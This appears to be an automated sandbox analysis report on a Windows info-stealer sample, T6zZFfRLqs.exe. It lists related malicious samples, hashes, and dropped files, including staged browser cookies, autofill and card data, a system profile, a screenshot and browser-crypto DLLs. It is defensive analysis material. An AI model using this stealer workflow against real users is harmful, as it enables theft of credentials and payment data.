	W7fb1ECIQA.exe	Get hash	malicious	Browse
	R9LbEnIk0s.exe	Get hash	malicious	Browse
	7XmWGse79x.exe	Get hash	malicious	Browse
	m5W1BZQU4m.exe	Get hash	malicious	Browse
	hHsIHUGICB.exe	Get hash	malicious	Browse
	NOgYb2fHbO.exe	Get hash	malicious	Browse
	VwDvbAowp0.exe	Get hash	malicious	Browse
	lXy3MnXJ83.exe	Get hash	malicious	Browse
	SebwAujas5.exe	Get hash	malicious	Browse
	nxW9yUgdYM.exe	Get hash	malicious	Browse
	cxBR3cCGTw.exe	Get hash	malicious	Browse
	k5THcVgINl.exe	Get hash	malicious	Browse
	b2i2IopgOC.exe	Get hash	malicious	Browse
	G2BPn4a7o1.exe	Get hash	malicious	Browse
	qOsCIQD1uR.exe	Get hash	malicious	Browse
	p0FDRanFUE.exe	Get hash	malicious	Browse
	Tt5xbxWwsb.exe	Get hash	malicious	Browse
	rJPkGz9DpL.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\d06ed635-68f6-4e9a-955c-4899f5f57b9a0565504142.zip Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	86146
Entropy (8bit):	7.988500919143562
Encrypted:	false
SSDEEP:	1536:MivE9ss2LPGQjl0Pb9bKTeZp0Dn2tcnwbHXyqCB0QDO61MeVeazo67q5ronEdubN:Mic9h2SL9b4sp0T2t5HXkF31MyeazoO7
MD5:	83F5D295706AD005C33D1C96CE1768F9
SHA1:	7283873EDB248AC10553EE0B0D4079B1D8001118
SHA-256:	95346A160787AF310B80C02F28BDAED3558EF2774D16C850E0737050D9DDD4D5
SHA-512:	F9A64DD49FBE723FE50C3F3BDDD4F42D038259902A96B2E4952FCB891836E51709DA07C084E361CFE04006F206C35538B2EA9FA611946D75403415E945D4DE59
Malicious:	false
Reputation:	low
Preview:	PK........4.<S............#.../Autofill/Google Chrome_Default.txtUT....pRa.pRa.pRa..PK........4.<S............#.../Autofill/Google Chrome_Default.txtUT....pRa.pRa.pRaPK........2.<S................/CC/Google Chrome_Default.txtUT....pRa.pRa.pRa..PK........2.<S................/CC/Google Chrome_Default.txtUT....pRa.pRa.pRaPK........2.<S................/Cookies/Edge_Cookies.txtUT....pRa.pRa.pRa..PK........2.<S................/Cookies/Edge_Cookies.txtUT....pRa.pRa.pRaPK........2.<S............".../Cookies/Google Chrome_Default.txtUT....pRa.pRa.pRa-..r.0...5..hK@....<x...R..\ ..2tj...nz6g..I.5L_....y......A....^........"...n.]....YL2..E[_....U...%KY.jv.bTw..#..6......w...@5...H....)..Bp./A<......>........(.)=..B.V.s.s...5.C.Sx~..PK........2.<Sp...........".../Cookies/Google Chrome_Default.txtUT....pRa.pRa.pRaPK........2.<S................/Cookies/IE_Cookies.txtUT....pRa.pRa.pRa..PK........2.<S................/Cookies/IE_Cookies.txtUT....pRa.pRa.pRaPK........2.<S............$.../Do

C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\Google Chrome_Default.txt Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.748326181791092
Encrypted:	false
SSDEEP:	6:PkopYjdfOoX51TbDgivd4YMrd71DLE7XGsTQ4DW:copYxfOop1Tt4YYd7JL8h3i
MD5:	0E37A051C705869E8440255E0C5A4D82
SHA1:	AEF4B628215185F8FEA4681ECD2F77FF892F6033
SHA-256:	4652C43B2F5D51B901F1D6828024918F1E7358B2931CACB5D1B18BD0E4A99A6A
SHA-512:	DE12E5F572671107C198E9D3C16FCD02B8212D47A70692C10E7E59EA037CA79BC2B4AB1042810B7D7C37C576FF679DA4C31E0FC85B2B8048B4D7651A26F20BB0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.google.com.FALSE./.FALSE.1617283352.NID.204=XlJ-cT9Xg8DDNcFChe-nUGbxxEez8DRPGzgzUdZjP1JdN2YiNhfyRKFYdvFacUiguPGJxNZQxNzSiNVBcKqtq4ja7gbbvS3qQExvrcATH8SyD8dfy7IhIXh65vwy9wvzcYGB8MPR2c8HHGKEWDbc9DczP4qY4Ggc7D8ZFucZfEc..

C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Files\Default.zip Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	22
Entropy (8bit):	1.0476747992754052
Encrypted:	false
SSDEEP:	3:pjt/l:Nt
MD5:	76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:	B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:	8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:	5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	PK....................

C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\information.txt Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	ISO-8859 text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12029
Entropy (8bit):	5.280931554276703
Encrypted:	false
SSDEEP:	192:2OIOQ2L6iQgqMlZC0e/s2ipgBdQXRsg8qbNqqN:jxQVxPMzC0Gs2ipgUX2MboqN
MD5:	6B6D12801633AF1D905289A595270D52
SHA1:	75CC6DD0B756C54BA88C08B61637C65ABD0667F6
SHA-256:	239B1734C6C75D56F484D973D28A5AD242F38983986F212E200419F39E0CFB31
SHA-512:	FA4C09832DF4B4F57C016388D04E87A0EAD5D13A0285B2BCBF7278021BBB56BF046257AD60F9EAB8BD3A122289ACB6B9FB7E743131E4A0AD9E7F4D2B7673FD2B
Malicious:	false
Preview:	Version: 41....Date: Mon Sep 27 18:33:10 2021..MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963....Path: C:\Users\user\Desktop\T6zZFfRLqs.exe ..Work Dir: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5 ....Windows: Windows 10 Pro [x64]..Computer Name: 932923..User Name: user..Display Resolution: 1280x1024..Display Language: en-US..Keyboard Languages: English (United States)..Local Time: 27/9/2021 18:33:10..TimeZone: UTC-8....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard: Microsoft Basic Display Adapter....[Processes]..---------- System [4]..------------------------------ Registry [88]..- smss.exe [296]..- csrss.exe [388]..- wininit.exe [468]..- csrss.exe [480]..- services.exe [560]..- winlogon.exe [568]..- lsass.exe [588]..- fontdrvhost.exe [688]..- fontdrvhost.exe [696]..- svchost.exe [716]..- svchost.exe [792]..- svchost.ex

C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\screenshot.jpg Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	84556
Entropy (8bit):	7.8956169781643535
Encrypted:	false
SSDEEP:	1536:Cp7TSq2Dzv0GKZae9Ud+h5EF7hWGiCz753EVWIl1iP/tofdpNkM9OvkQP9BhXI1j:FT3v0G2HK+5ahWGiCREhTyeffyE1oK
MD5:	E70E8D509DAD628815E8438AFC383275
SHA1:	39E83409B16CA8344521C706C338E674F393AA94
SHA-256:	8FFFA619BCC1BBB76A287645CDB1B1EB2B5BC039DCCE7BF937CE678AFD3E379B
SHA-512:	7497E77FD4A41CD811CFD3C512210B68FE8E3D2262CFFF979267273A34FB0E4E5B50FCB3BC111DC2EBBC8B2B406A18BC17DB4C9EB0D233AF393DDF9B7D2C1CC8
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(..V.5.?......x...1.,,..6.$-......*d.U....yM-}5.....<p...F....$...3..........._.Ug..i..=..^8.Gi5..

C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\temp Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	446464
Entropy (8bit):	0.7604971265724939
Encrypted:	false
SSDEEP:	768:kioiWBBj9oiWBBjN20olG4oNQraFB/JraFB/Q:Gizindo6QLQG
MD5:	C10344289448C94CF3F5AE6E3188725E
SHA1:	D769BB5C803762A2C0169651D6FC6B1EEE66ABE5
SHA-256:	5E0F2B44D04FFC1B5C7ADBB1DA4834517BE805EABDE32B213E6F04B9E87DE852
SHA-512:	CE710B9E0EE10792796FA5A04BCAA5A39F24001FA00B510D26B933DB1CFDDF4EDD8E0FA2DD6B8AE3E1959C966CC04FB66BEC3EF003A0FEC94C6CB768792A33E9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: nY67wl47QZ.exe, Detection: malicious, Browse Filename: OfE705GyPZ.exe, Detection: malicious, Browse Filename: W7fb1ECIQA.exe, Detection: malicious, Browse Filename: R9LbEnIk0s.exe, Detection: malicious, Browse Filename: 7XmWGse79x.exe, Detection: malicious, Browse Filename: m5W1BZQU4m.exe, Detection: malicious, Browse Filename: hHsIHUGICB.exe, Detection: malicious, Browse Filename: NOgYb2fHbO.exe, Detection: malicious, Browse Filename: VwDvbAowp0.exe, Detection: malicious, Browse Filename: lXy3MnXJ83.exe, Detection: malicious, Browse Filename: SebwAujas5.exe, Detection: malicious, Browse Filename: nxW9yUgdYM.exe, Detection: malicious, Browse Filename: cxBR3cCGTw.exe, Detection: malicious, Browse Filename: k5THcVgINl.exe, Detection: malicious, Browse Filename: b2i2IopgOC.exe, Detection: malicious, Browse Filename: G2BPn4a7o1.exe, Detection: malicious, Browse Filename: qOsCIQD1uR.exe, Detection: malicious, Browse Filename: p0FDRanFUE.exe, Detection: malicious, Browse Filename: Tt5xbxWwsb.exe, Detection: malicious, Browse Filename: rJPkGz9DpL.exe, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nss3[1].dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\vcruntime140[1].dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\msvcp140[1].dll Download File
Process:	C:\Users\user\Desktop\T6zZFfRLqs.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.855560391702203
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	T6zZFfRLqs.exe
File size:	599552
MD5:	5d5e83e151a99bed97e13839e8881cb5
SHA1:	4f008fe578e0f32ed5dda8d30883a900630f1be4
SHA256:	1a0f891e8d7d659d550b35c54f542180cd2629d3a62e35e695e43fd1f5dad0b3
SHA512:	23705b79eac9d8725a1f366ba685664345d5dbca951d82b2fd554efde68d7fc038180e26329adaf43ac693b84c292ab12585237433c0c4e085c0f785cb43506b
